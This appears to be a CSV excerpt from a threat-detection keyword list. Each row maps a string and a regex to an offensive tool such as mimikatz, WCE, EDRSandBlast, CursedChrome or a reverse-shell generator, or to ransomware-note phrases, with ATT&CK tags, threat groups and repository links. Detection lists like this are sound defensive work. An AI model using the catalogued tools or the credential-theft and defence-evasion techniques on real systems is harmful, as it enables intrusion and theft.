"*Wanetty inspired by @JoelGMSec*",".{0,1000}Wanetty\sinspired\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux #content","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","62351"
"*wapiti -u*",".{0,1000}wapiti\s\-u.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62352"
"*wapiti.git*",".{0,1000}wapiti\.git.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62353"
"*wapiti.py*",".{0,1000}wapiti\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62354"
"*wapiti3-*.tar.gz*",".{0,1000}wapiti3\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62355"
"*wapiti3-*-any.whl*",".{0,1000}wapiti3\-.{0,1000}\-any\.whl.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62356"
"*wapiti3/bin*",".{0,1000}wapiti3\/bin.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62357"
"*wapiti-getcookie*",".{0,1000}wapiti\-getcookie.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62358"
"*wappalyzer.py*",".{0,1000}wappalyzer\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62359"
"*warberry*",".{0,1000}warberry.{0,1000}","offensive_tool_keyword","warberry","WarBerryPi is a RaspberryPi based hardware implant that has the ability to go on stealth mode when used in acuiring informational data from a target network. especially useful during read teaming engagements. Its designed with a special feature that allows it to get the needed information within the shortest time possible. WarBerryPis scripts are designed in such way to avoid noise in the network as much as possible.","T1589 - T1539 - T1562","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/secgroundzero/warberry","1","1","N/A","N/A","N/A","10","2223","289","2019-11-09T00:09:44Z","2016-05-10T16:25:03Z","62360"
"*warpzoneclient.cpp*",".{0,1000}warpzoneclient\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62361"
"*warpzoneclient.exe*",".{0,1000}warpzoneclient\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62362"
"*warpzoneclient.exe*",".{0,1000}warpzoneclient\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62363"
"*warpzoneclient.sln*",".{0,1000}warpzoneclient\.sln.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62364"
"*warpzoneclient.vcxproj*",".{0,1000}warpzoneclient\.vcxproj.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62365"
"*washingtonP1974/Rev-Shell*",".{0,1000}washingtonP1974\/Rev\-Shell.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","62366"
"*Wat, this shouldn't happen? Orphaned message (somebody might be probing you!):*",".{0,1000}Wat,\sthis\sshouldn\'t\shappen\?\sOrphaned\smessage\s\(somebody\smight\sbe\sprobing\syou!\)\:.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","62367"
"*WatermelonMakeup.azurewebsites.net*",".{0,1000}WatermelonMakeup\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","62368"
"*wavestone-cdt/EDRSandblast*",".{0,1000}wavestone\-cdt\/EDRSandblast.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","62369"
"*wavestone-cdt/Invoke-CleverSpray*",".{0,1000}wavestone\-cdt\/Invoke\-CleverSpray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","62370"
"*wavvs/nanorobeus*",".{0,1000}wavvs\/nanorobeus.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","62371"
"*WayneEvenson@protonmail.com*",".{0,1000}WayneEvenson\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62372"
"*WayneEvenson@tutanota.com*",".{0,1000}WayneEvenson\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62373"
"*waza1234*",".{0,1000}waza1234.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation default password","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","62374"
"*Waza1234/Waza1234/Waza1234/*",".{0,1000}Waza1234\/Waza1234\/Waza1234\/.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","62375"
"*WazeHell/sam-the-admin*",".{0,1000}WazeHell\/sam\-the\-admin.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078.002 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","1","N/A","N/A","N/A","10","1012","193","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z","62376"
"*WCE %s (Windows Credentials Editor)*",".{0,1000}WCE\s\%s\s\(Windows\sCredentials\sEditor\).{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","62381"
"*wce -i 3e5 -s *",".{0,1000}wce\s\-i\s3e5\s\-s\s.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A","62382"
"*WCE v1.0 (Windows Credentials Editor)*",".{0,1000}WCE\sv1\.0\s\(Windows\sCredentials\sEditor\).{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","62383"
"*WCE v1.2 (Windows Credentials Editor)*",".{0,1000}WCE\sv1\.2\s\(Windows\sCredentials\sEditor\).{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","62384"
"*wce*getlsasrvaddr.exe*",".{0,1000}wce.{0,1000}getlsasrvaddr\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","62385"
"*wce-master.zip*",".{0,1000}wce\-master\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","62386"
"*wce-universal.exe*",".{0,1000}wce\-universal\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","62387"
"*wcfrelayserver.py*",".{0,1000}wcfrelayserver\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","62388"
"*wcfrelayserver.py*",".{0,1000}wcfrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","62389"
"*WCMCredentials.txt*",".{0,1000}WCMCredentials\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62390"
"*wdextract *:\*\*.vdm*",".{0,1000}wdextract\s.{0,1000}\:\\.{0,1000}\\.{0,1000}\.vdm.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","62391"
"*wdextract *\mrt.exe*",".{0,1000}wdextract\s.{0,1000}\\mrt\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","62392"
"*WDExtract-master*",".{0,1000}WDExtract\-master.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","62393"
"*WDFilter has been successfully unloaded, use option 2 to disable Tamper Protection.*",".{0,1000}WDFilter\shas\sbeen\ssuccessfully\sunloaded,\suse\soption\s2\sto\sdisable\sTamper\sProtection\..{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","62394"
"*wdigest!g_fParameter_UseLogonCredential*",".{0,1000}wdigest!g_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","62395"
"*wdigest!g_IsCredGuardEnabled*",".{0,1000}wdigest!g_IsCredGuardEnabled.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","62396"
"*wdigest/decryptor.py*",".{0,1000}wdigest\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","62397"
"*--wdigest-offsets *.csv *",".{0,1000}\-\-wdigest\-offsets\s.{0,1000}\.csv\s.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","62398"
"*WdigestOffsets.csv*",".{0,1000}WdigestOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","62399"
"*WE DESTROYED YOU BACKUPS*",".{0,1000}WE\sDESTROYED\sYOU\sBACKUPS.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62400"
"*WE HACKED YOU*",".{0,1000}WE\sHACKED\sYOU.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62401"
"*We had a woodoo*",".{0,1000}We\shad\sa\swoodoo.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","62402"
"*We recommend to XOR your shellcode before you transfer it*",".{0,1000}We\srecommend\sto\sXOR\syour\sshellcode\sbefore\syou\stransfer\sit.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","#content","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","62403"
"*we will continue the process of leaking or selling your documents*",".{0,1000}we\swill\scontinue\sthe\sprocess\sof\sleaking\sor\sselling\syour\sdocuments.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62404"
